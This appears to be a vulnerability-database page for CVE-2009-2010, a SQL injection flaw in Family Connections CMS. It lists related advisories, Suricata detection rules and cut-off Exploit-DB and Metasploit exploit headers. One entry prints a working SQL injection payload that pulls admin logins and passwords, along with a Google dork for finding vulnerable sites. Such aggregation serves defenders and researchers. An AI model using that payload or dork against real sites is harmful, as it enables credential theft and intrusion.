CVE-2009-2010
published 2009-06-08CVE-2009-2010: Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL…
PriorityP433medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
0.90%
55.2th percentile
Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| g.rodola | pyftpdlib | >= 0 < 0.5.1 | 0.5.1 |
| haudenschilt | family_connections_cms | <= 1.9 | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
| haudenschilt | family_connections_cms | — | — |
CVSS provenance
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
ghsa4.3MEDIUM
vendor_cisco7.8HIGH
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jhh8-5vg7-8rmx: Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1
ghsa_unreviewed·2022-05-02
CVE-2009-2010 [MEDIUM] CWE-89 GHSA-jhh8-5vg7-8rmx: Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1
Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.
GHSA
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') in pyftpdlib
ghsa·2022-05-02·CVSS 4.3
CVE-2009-5010 [MEDIUM] CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') in pyftpdlib
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') in pyftpdlib
Race condition in the FTPHandler class in ftpserver.py in pyftpdlib before 0.5.1 allows remote attackers to cause a denial of service (daemon outage) by establishing and then immediately closing a TCP connection, leading to the accept function having an unexpected return value of None, a different vulnerability than CVE-2010-3494.
Cisco
Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerabilities
vendor_cisco·2010-09-22·CVSS 7.8
CVE-2009-2051 [HIGH] CWE-399 Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerabilities
Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerabilities
Multiple vulnerabilities exist in the Session Initiation Protocol (SIP)
implementation in Cisco IOS® Software that could
allow an unauthenticated, remote attacker to cause a reload of an affected
device when SIP operation is enabled.
Cisco has released software updates that address these vulnerabilities. There are no workarounds for devices that must run SIP;
however, mitigations are available to limit exposure to the
vulnerabilities.
This advisory is posted at
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20100922-sip.
Note: The September 22, 2010, Cisco IOS Software Security Advisory bundled
publication includes six Cisco Security Advisories. Five of the advisories
Red Hat
pcsc-lite: Privilege escalation via specially-crafted client to PC/SC Smart Card daemon messages
vendor_redhat·2010-06-10·CVSS 6.8
CVE-2009-4902 [MEDIUM] CWE-228 pcsc-lite: Privilege escalation via specially-crafted client to PC/SC Smart Card daemon messages
pcsc-lite: Privilege escalation via specially-crafted client to PC/SC Smart Card daemon messages
Buffer overflow in the MSGFunctionDemarshall function in winscard_svc.c in the PC/SC Smart Card daemon (aka PCSCD) in MUSCLE PCSC-Lite 1.5.4 and earlier might allow local users to gain privileges via crafted SCARD_CONTROL message data, which is improperly demarshalled. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-0407.
Statement: Not vulnerable. This issue did not affect the versions of pcsc-lite as shipped with Red Hat Enterprise Linux 5.
Package: pcsc-lite (Red Hat Enterprise Linux 5) - Affected
Package: pcsc-lite (Red Hat Enterprise Linux 6) - Affected
Red Hat
texlive: Buffer overflow flaw by processing virtual font files
vendor_redhat·2010-03-25·CVSS 6.8
CVE-2010-0827 [MEDIUM] texlive: Buffer overflow flaw by processing virtual font files
texlive: Buffer overflow flaw by processing virtual font files
Integer overflow in dvips in TeX Live 2009 and earlier, and teTeX, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted virtual font (VF) file associated with a DVI file.
Red Hat
libESMTP: Multiple certificate validation flaws
vendor_redhat·2010-03-03·CVSS 5.9
CVE-2010-1192 [MEDIUM] libESMTP: Multiple certificate validation flaws
libESMTP: Multiple certificate validation flaws
libESMTP, probably 1.0.4 and earlier, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
Package: libesmtp (Red Hat Enterprise Linux 6) - Affected
BSD
FreeBSD-SA-10:02.ntpd: ntpd mode 7 denial of service
bsd_advisories·2010-01-06·CVSS 6.4
CVE-2009-3563 [MEDIUM] FreeBSD-SA-10:02.ntpd: ntpd mode 7 denial of service
FreeBSD-SA-10:02.ntpd Security Advisory
The FreeBSD Project
Topic: ntpd mode 7 denial of service
Category: contrib
Module: ntpd
Announced: 2010-01-06
Affects: All supported versions of FreeBSD.
Corrected: 2010-01-06 21:45:30 UTC (RELENG_8, 8.0-STABLE)
2010-01-06 21:45:30 UTC (RELENG_8_0, 8.0-RELEASE-p2)
2010-01-06 21:45:30 UTC (RELENG_7, 7.2-STABLE)
2010-01-06 21:45:30 UTC (RELENG_7_2, 7.2-RELEASE-p6)
2010-01-06 21:45:30 UTC (RELENG_7_1, 7.1-RELEASE-p10)
2010-01-06 21:45:30 UTC (RELENG_6, 6.4-STABLE)
2010-01-06 21:45:30 UTC (RELENG_6_4, 6.4-RELEASE-p9)
2010-01-06 21:45:30 UTC (RELENG_6_3, 6.3-RELEASE-p15)
CVE Name: CVE-2009-3563
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please
Suricata
ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection
suricata·2010-07-30·CVSS 7.5
CVE-2009-0296 [HIGH] ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection
ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/shop_display_products.php?"; nocase; content:"cat_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,CVE-2009-0296; reference:url,secunia.com/advisories/33661/; reference:url,milw0rm.com/exploits/7873; classtype:web-application-attack; sid:2009199; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
suricata·2010-07-30
CVE-2009-1151 ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"c="; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010903; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-1029 POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 DATE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted DATE string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-10
Exploit-DB
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-3031 Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: symantec_consoleutilities_browseandsavefile.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbit
Exploit-DB
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
exploitdb·2010-11-11
CVE-2009-2364 MP3-Nator 2.0 - Local Buffer Overflow (SEH)
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
---
#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10\11\2010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Writted By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: [email protected]
#
#
import os,sys
def layout():
os.system("cls")
os.system("color 4f")
print("\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0")
print("[+]Author : C4SS!0 G0M3S")
print("[+]E-mail : [email protected]")
print("[+]Home : http://www.invasao.com.br")
print("[+]Impact : Hich")
print("[+]Version : 2.0\n")
if len(sys.argv)!=2:
layout()
print("[-]Usage: Exploit.
Exploit-DB
SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-3861 SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)
SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)
---
##
# $Id: safenet_softremote_groupname.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SafeNet SoftRemote GROUPNAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SafeNet SoftRemote
Security Policy Editor MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-3861' ],
[ 'OSVDB', '59660'],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-09-008'
Exploit-DB
libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)
exploitdb·2010-10-07·CVSS 7.8
CVE-2010-2632 [HIGH] libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)
libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)
---
Source: http://securityreason.com/securityalert/7822
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote
ftpd-anon) ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 06.11.2009
- - Pub.: 07.10.2010
CVE: CVE-2010-2632
Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)
Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"
and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.co
Exploit-DB
Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)
exploitdb·2010-09-25
CVE-2009-0927 Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)
Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)
---
##
# $Id: adobe_geticon.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe Collab.getIcon() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include MSF_LICENSE,
'Author' =>
[
'MC',
'Didier Stevens ',
'jduck'
],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0927' ],
[ 'OSVDB', '53647' ],
[ 'URL', 'http://www.zerodayin
Exploit-DB
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)
exploitdb·2010-09-25
CVE-2009-3459 Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)
---
##
# $Id: adobe_flatedecode_predictor02.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe FlateDecode Stream Predictor 02 Integer Overflow',
'Description' => %q{
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe
Acrobat Professional versions before 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'jduck'
],
'Version' => '$Revi
Exploit-DB
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
exploitdb·2010-09-20
CVE-2009-2990 Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
---
##
# $Id: adobe_u3d_meshcont.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Description' => %q{
This module exploits an array overflow in Adobe Reader and Adobe Acrobat.
Affected versions include MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano ',
'jduck'
],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2009-2990' ],
[ 'OSVDB', '58920'
Exploit-DB
Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
exploitdb·2010-08-25
CVE-2009-3837 Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: eureka_mail_err.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
# bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1
# overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address
'Description' => %q{
This module exploits a buffer overflow in the Eureka Email 2.2q
client that is triggered through an excessively long ERR message.
NOTE: this
Exploit-DB
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)
exploitdb·2010-07-12
CVE-2009-3672 Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)
---
##
# $Id: ms09_072_style_object.rb 9787 2010-07-12 02:51:50Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
# :rank => LowRanking # exploitable on ie7/vista
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Style
Exploit-DB
IBM Bladecenter Management - Multiple Web Application Vulnerabilities
exploitdb·2010-07-06
CVE-2010-2656 IBM Bladecenter Management - Multiple Web Application Vulnerabilities
IBM Bladecenter Management - Multiple Web Application Vulnerabilities
---
[DSECRG-09-054] IBM Bladecenter Management - Multiple vulnerabilities
The BladeCenter management module is prone to multiple security vulnerabilities: Unauthorized Access, Directory Listing, XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-054
Application: IBM BladeCenter Managemet Module
Versions Affected: BPET48L and may be other versions
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS,Directory traversal, Information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
The BladeCenter manage
Exploit-DB
ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2009-3976 ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)
ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)
---
##
# $Id: proftp_banner.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'ProFTP 2.9 Banner Remote Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in the ProFTP 2.9
client that is triggered through an excessively long welcome message.
},
'Author' => [ 'His0k4 ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2009-3976' ],
[ 'OSVDB', '57394' ],
[ 'URL', 'http://www.labtam-inc.com/index.ph
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb·2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
exploitdb·2010-06-15
CVE-2009-0658 Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
---
##
# $Id: adobe_jbig2decode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort
Exploit-DB
Amaya Browser 11.0 - bdo tag Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2009-0323 Amaya Browser 11.0 - bdo tag Overflow (Metasploit)
Amaya Browser 11.0 - bdo tag Overflow (Metasploit)
---
##
# $Id: amaya_bdo.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Amaya Browser v11.0 bdo tag overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Amaya v11 Browser.
By sending an overly long string to the "bdo"
tag, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'dookie, original exploit by Rob Carter' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2009
Exploit-DB
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2009-1612 BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
---
##
# $Id: baofeng_storm_onbeforevideodownload.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX
control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing
an overly long string to the method "OnBeforeVideoDownload" an attacker
Exploit-DB
cms (id) 5.0 - SQL Injection
exploitdb·2010-04-22
CVE-2009-2439 cms (id) 5.0 - SQL Injection
cms (id) 5.0 - SQL Injection
---
CmS (id) SQL Injection Vulnerability
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
Exploitz:
~~~~~~~
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
Us,lulz...'
-
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn
Exploit-DB
IBM Bladecenter Management Module - Denial of Service
exploitdb·2010-04-15
CVE-2010-1460 IBM Bladecenter Management Module - Denial of Service
IBM Bladecenter Management Module - Denial of Service
---
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
Source: http://www.dsecrg.com/pages/vul/show.php?id=149
This device can be remotely rebooted by sending a malformed TCP packets
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049
Application: IBM BladeCenter Managmet Module
Versions Affected: before BPET50G
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: DoS
Exploits: YES
Reported: 24.07.2009
Vendor response: 26.07.2009
Date of Public Advisory: 15.04.2010
Solution: YES
Author: Alexey Sintsov
of Digital Security Research Group [DSecRG]
Description
The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter
chassis management bay. The manageme
Exploit-DB
Adobe (Multiple Products) - XML External Entity / XML Injection
exploitdb·2010-02-22·CVSS 6.5
CVE-2009-3960 [MEDIUM] Adobe (Multiple Products) - XML External Entity / XML Injection
Adobe (Multiple Products) - XML External Entity / XML Injection
---
( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML E
Exploit-DB
Kaspersky AV 2010 9.0.0.463 - Local Denial of Service
exploitdb·2009-09-29
CVE-2009-4114 Kaspersky AV 2010 9.0.0.463 - Local Denial of Service
Kaspersky AV 2010 9.0.0.463 - Local Denial of Service
---
#include
#include
#include
#include
#include
/*
Program : Kaspersky Anti-Virus 2010 9.0.0.463
Homepage : http://www.kaspersky.com
Discovery : 2009/09/29
Author Contacted : 2009/10/01
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
The most trusted virus and spyware protection - premium protection
against viruses, spyware, Trojans, worms, bots and more. Also includes
comprehensive phishing and identity theft defense and superfast performance.
//----- Description of vulnerability
kl1.sys driver don't check inputs address of an IOCTL. An exception can be
thrown if we modify one or two DWORDs.
With my test I can't do best exploitation than a BSOD.
//----- Credits
http://
Exploit-DB
Family Connections CMS 1.9 - SQL Injection
exploitdb·2009-05-13
CVE-2009-2010 Family Connections CMS 1.9 - SQL Injection
Family Connections CMS 1.9 - SQL Injection
---
#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#** **
#** **
#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
#** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> WEB: http://www.fa
Bugzilla
CVE-2010-2055 CVE-2009-3743 ghostscript various flaws [fedora-all]
bugzilla·2011-11-22·CVSS 9.3
CVE-2010-2055 [CRITICAL] CVE-2010-2055 CVE-2009-3743 ghostscript various flaws [fedora-all]
CVE-2010-2055 CVE-2009-3743 ghostscript various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
